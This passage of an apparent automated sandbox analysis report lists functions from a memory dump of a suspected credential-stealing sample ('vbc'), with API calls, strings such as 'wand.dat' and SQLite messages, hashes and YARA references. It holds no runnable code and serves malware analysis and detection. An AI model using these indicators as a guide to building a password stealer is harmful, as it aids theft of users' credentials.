                                                                                                                                                                        • GetWindowRect.USER32 ref: 0040B62D
                                                                                                                                                                        • GetClientRect.USER32 ref: 0040B638
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 0040B648
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040B664
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4247780290-0
                                                                                                                                                                        • Opcode ID: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
                                                                                                                                                                        • Instruction ID: 46ce5f71d2b2052eec3e6930e994fa0a792d7dbc784fe0d7727ff2cdb1cfdf95
                                                                                                                                                                        • Opcode Fuzzy Hash: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D014836401129BBDB119BA59C49EFFBFBCFF06755F04402AFD01A2181D77895028BA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004442F9 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00444324
                                                                                                                                                                        • memset.MSVCRT ref: 00444333
                                                                                                                                                                          • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00444356
                                                                                                                                                                          • Part of subcall function 004440EA: memchr.MSVCRT ref: 00444125
                                                                                                                                                                          • Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441C9
                                                                                                                                                                          • Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441DB
                                                                                                                                                                          • Part of subcall function 004440EA: memcpy.MSVCRT ref: 00444203
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044435D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1471605966-0
                                                                                                                                                                        • Opcode ID: d675db4136e80266a2e6e489a5d886d4055744e95b8a0a787b2a16d9fa1a1fa5
                                                                                                                                                                        • Instruction ID: 37ddc15cde46eb5ec9a675e84f83cfdfb4636f792b79cf1c8c19bfac071e4967
                                                                                                                                                                        • Opcode Fuzzy Hash: d675db4136e80266a2e6e489a5d886d4055744e95b8a0a787b2a16d9fa1a1fa5
                                                                                                                                                                        • Instruction Fuzzy Hash: 64F0C8765006106AE2203732AC89F6B2B5C9FD6761F14043FF916911D2EE2C98148179
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040C11B Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                                        • Opcode ID: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
                                                                                                                                                                        • Instruction ID: ce0d416df33b84177c5a77da38496f7ed087613ba8a01eb08bd82b7dd0746caf
                                                                                                                                                                        • Opcode Fuzzy Hash: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
                                                                                                                                                                        • Instruction Fuzzy Hash: D0F049B25047018FE720AFA9E9C091BF3E9AB49714761093FF049D7682DB7CAC808A0C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D913 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040D937
                                                                                                                                                                        • memset.MSVCRT ref: 0040D94E
                                                                                                                                                                          • Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
                                                                                                                                                                          • Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 0040D97D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                        • String ID: </%s>
                                                                                                                                                                        • API String ID: 3400436232-259020660
                                                                                                                                                                        • Opcode ID: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
                                                                                                                                                                        • Instruction ID: 1f907657c5db402736beb96cf917ebbb27e5637f268f278bd00e4de1d3b551c4
                                                                                                                                                                        • Opcode Fuzzy Hash: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
                                                                                                                                                                        • Instruction Fuzzy Hash: A701D6B2D4022967E720A755CC45FEA776CEF45308F0400B6BB08B3181DB78DA458AA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B720 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                        • String ID: caption
                                                                                                                                                                        • API String ID: 1523050162-4135340389
                                                                                                                                                                        • Opcode ID: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
                                                                                                                                                                        • Instruction ID: 685c7242f617fb3ba1e31657fb4388fb0a14aaa92a56732ea005dddfaa5a5635
                                                                                                                                                                        • Opcode Fuzzy Hash: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
                                                                                                                                                                        • Instruction Fuzzy Hash: B1F0AF369007186AFB20AB54DC4AB9A326CEB41705F4000B6FA04B71D2DBB8ED80CADC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004088A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileNameOpenwcscpy
                                                                                                                                                                        • String ID: X$xK@
                                                                                                                                                                        • API String ID: 3246554996-3735201224
                                                                                                                                                                        • Opcode ID: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
                                                                                                                                                                        • Instruction ID: b0b1e818a48a7f3500c0daa10f1625907e8ff6cd2dadba3970951ebcab59a6c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
                                                                                                                                                                        • Instruction Fuzzy Hash: 28015FB1D0064C9FDB41DFE9D8856CEBBF4AB09314F10802AE869F6240EB7495458F55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040103E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004082B5: memset.MSVCRT ref: 004082BF
                                                                                                                                                                          • Part of subcall function 004082B5: wcscpy.MSVCRT ref: 004082FF
                                                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                                                                                                                                                        • SendDlgItemMessageW.USER32 ref: 0040107C
                                                                                                                                                                        • SendDlgItemMessageW.USER32 ref: 0040109A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                        • String ID: MS Sans Serif
                                                                                                                                                                        • API String ID: 210187428-168460110
                                                                                                                                                                        • Opcode ID: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
                                                                                                                                                                        • Instruction ID: 6a7807da2d6c22504d803769321e4de0e3b0b92c14fc4c1b5eee7474059f757a
                                                                                                                                                                        • Opcode Fuzzy Hash: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
                                                                                                                                                                        • Instruction Fuzzy Hash: 9EF08275A40B0877EA31ABA0DC06F9A77B9B740B41F000939F751B91D1D7F5A185CA98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040840D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                        • String ID: edit
                                                                                                                                                                        • API String ID: 2747424523-2167791130
                                                                                                                                                                        • Opcode ID: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
                                                                                                                                                                        • Instruction ID: 157984a491cfffbc22861ef67f020c4accef2e0f69a1167183a5ff10ddf0174f
                                                                                                                                                                        • Opcode Fuzzy Hash: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
                                                                                                                                                                        • Instruction Fuzzy Hash: A2E04872D9031D6AFB10ABA0DC4EFAD77ACAB01748F1001B5B915E10D3EBB896454B45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004144AB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                        • API String ID: 2574300362-880857682
                                                                                                                                                                        • Opcode ID: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
                                                                                                                                                                        • Instruction ID: 5adcb90289d93a3714d1f61360fd38a26edcd17bcdb04c713309b7dc063e595c
                                                                                                                                                                        • Opcode Fuzzy Hash: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
                                                                                                                                                                        • Instruction Fuzzy Hash: 89D0C9BCD00304BFEB014F30AC8A70636A8B760BD7F10503AE001D1662EB78C1908B9C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041D1AF Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$memcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3384217055-0
                                                                                                                                                                        • Opcode ID: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
                                                                                                                                                                        • Instruction ID: 09945ccab50a33f31b382fa22860e11bd1319c866f4a66b9fbc9fb0ddb64ce7b
                                                                                                                                                                        • Opcode Fuzzy Hash: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
                                                                                                                                                                        • Instruction Fuzzy Hash: 2C21A4B2E14248ABDB18DBA5DC45FDF73FCAB85704F10442AF511D7181EA38E644C724
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00410212 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                                        • Opcode ID: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
                                                                                                                                                                        • Instruction ID: ff146c4b72cd3461ea0581b3b06c61829aab73f766a4367807c7cf9141d7c205
                                                                                                                                                                        • Opcode Fuzzy Hash: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C0128B1640B0066E2316B25CC07F5A73A4AFD2714F50061EF142666C2DFECE544815C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E5D7 Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004019F1: GetMenu.USER32(?), ref: 00401A0F
                                                                                                                                                                          • Part of subcall function 004019F1: GetSubMenu.USER32 ref: 00401A16
                                                                                                                                                                          • Part of subcall function 004019F1: EnableMenuItem.USER32 ref: 00401A2E
                                                                                                                                                                          • Part of subcall function 00401A38: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A4F
                                                                                                                                                                          • Part of subcall function 00401A38: SendMessageW.USER32(?,00000411,?,?), ref: 00401A73
                                                                                                                                                                        • GetMenu.USER32(?), ref: 0040E7C9
                                                                                                                                                                        • GetSubMenu.USER32 ref: 0040E7D6
                                                                                                                                                                        • GetSubMenu.USER32 ref: 0040E7D9
                                                                                                                                                                        • CheckMenuRadioItem.USER32 ref: 0040E7E5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1889144086-0
                                                                                                                                                                        • Opcode ID: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
                                                                                                                                                                        • Instruction ID: 25cc4134299d990fe6d22a23efa4e99655f13f9d527333d0ba489a0a70db3f06
                                                                                                                                                                        • Opcode Fuzzy Hash: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
                                                                                                                                                                        • Instruction Fuzzy Hash: EF519071B40604BBEB20ABA6CD4AF8FBAB9EB44704F00056DB248B72E2C6756D50DB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004178F0 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004179D3
                                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004179FE
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417A25
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417A3B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1661045500-0
                                                                                                                                                                        • Opcode ID: 1d89631bf252ae2f2c4c8445ece2b1e7c45986c35925c9de674870ee8545aac5
                                                                                                                                                                        • Instruction ID: 2596ed0fad154ed29ebf4184e1ce6d35beb67abfb73833eacff1bbd48ddff306
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d89631bf252ae2f2c4c8445ece2b1e7c45986c35925c9de674870ee8545aac5
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A516EB02087019FEB14CF25C981AABB7F5FF84344F10592EE88287A51E734F994CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0042E431 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004153D6: memset.MSVCRT ref: 004153F0
                                                                                                                                                                        • memcpy.MSVCRT ref: 0042E519
                                                                                                                                                                        Strings
                                                                                                                                                                        • virtual tables may not be altered, xrefs: 0042E470
                                                                                                                                                                        • sqlite_altertab_%s, xrefs: 0042E4EA
                                                                                                                                                                        • Cannot add a column to a view, xrefs: 0042E486
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemset
                                                                                                                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                        • API String ID: 1297977491-2063813899
                                                                                                                                                                        • Opcode ID: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
                                                                                                                                                                        • Instruction ID: bc03cdfccc2981246e0f5b9510b3d89990825f97592217a3aee3a84e95ce5e7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
                                                                                                                                                                        • Instruction Fuzzy Hash: E741B071A10215EFDB00DFA9D881A99B7F0FF48318F54815BE858DB352E778E990CB88
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00430484 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: $, $CREATE TABLE
                                                                                                                                                                        • API String ID: 3510742995-3459038510
                                                                                                                                                                        • Opcode ID: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
                                                                                                                                                                        • Instruction ID: 9113deda8d77e919ddbf50a6a1bf1eccfd02e82bbda2be63f83ad5433933bd3d
                                                                                                                                                                        • Opcode Fuzzy Hash: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C518E71D00119EFDB10DF98C491AAFB7B5EF48318F20819BD945AB205E738AA45CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00404AC0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00404B07
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                          • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                          • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                          • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                          • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                          • Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
                                                                                                                                                                          • Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
                                                                                                                                                                          • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
                                                                                                                                                                          • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
                                                                                                                                                                          • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
                                                                                                                                                                          • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81
                                                                                                                                                                          • Part of subcall function 004088A0: GetOpenFileNameW.COMDLG32(?), ref: 004088E9
                                                                                                                                                                          • Part of subcall function 004088A0: wcscpy.MSVCRT ref: 004088F7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                                                                                                                                        • String ID: *.*$dat$wand.dat
                                                                                                                                                                        • API String ID: 3589925243-1828844352
                                                                                                                                                                        • Opcode ID: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
                                                                                                                                                                        • Instruction ID: 189ab15ad594b46ceda1379ae2a6b1c5413d0dce04db73f13dfcb8633a17526e
                                                                                                                                                                        • Opcode Fuzzy Hash: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
                                                                                                                                                                        • Instruction Fuzzy Hash: 0841B771600205AFEF10EF61DD86ADE77B5FF40314F10802BFA05A71D2EB79A9958B98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E482 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
                                                                                                                                                                          • Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040E4B0
                                                                                                                                                                        • _wtoi.MSVCRT ref: 0040E4BC
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040E50A
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040E51B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1549203181-0
                                                                                                                                                                        • Opcode ID: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
                                                                                                                                                                        • Instruction ID: a8ded69f91e0d7bf63f89fae3ec1b4bc8203dfd4cc2a8694f23455ab63246b5f
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 06417131900204EFCF21DF9AC980A99B7B5EF48358F1548BAEC05EB396E738DA509B55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00406EB9 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemsetstrlen
                                                                                                                                                                        • String ID: Ap@$Ap@
                                                                                                                                                                        • API String ID: 160209724-724177859
                                                                                                                                                                        • Opcode ID: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
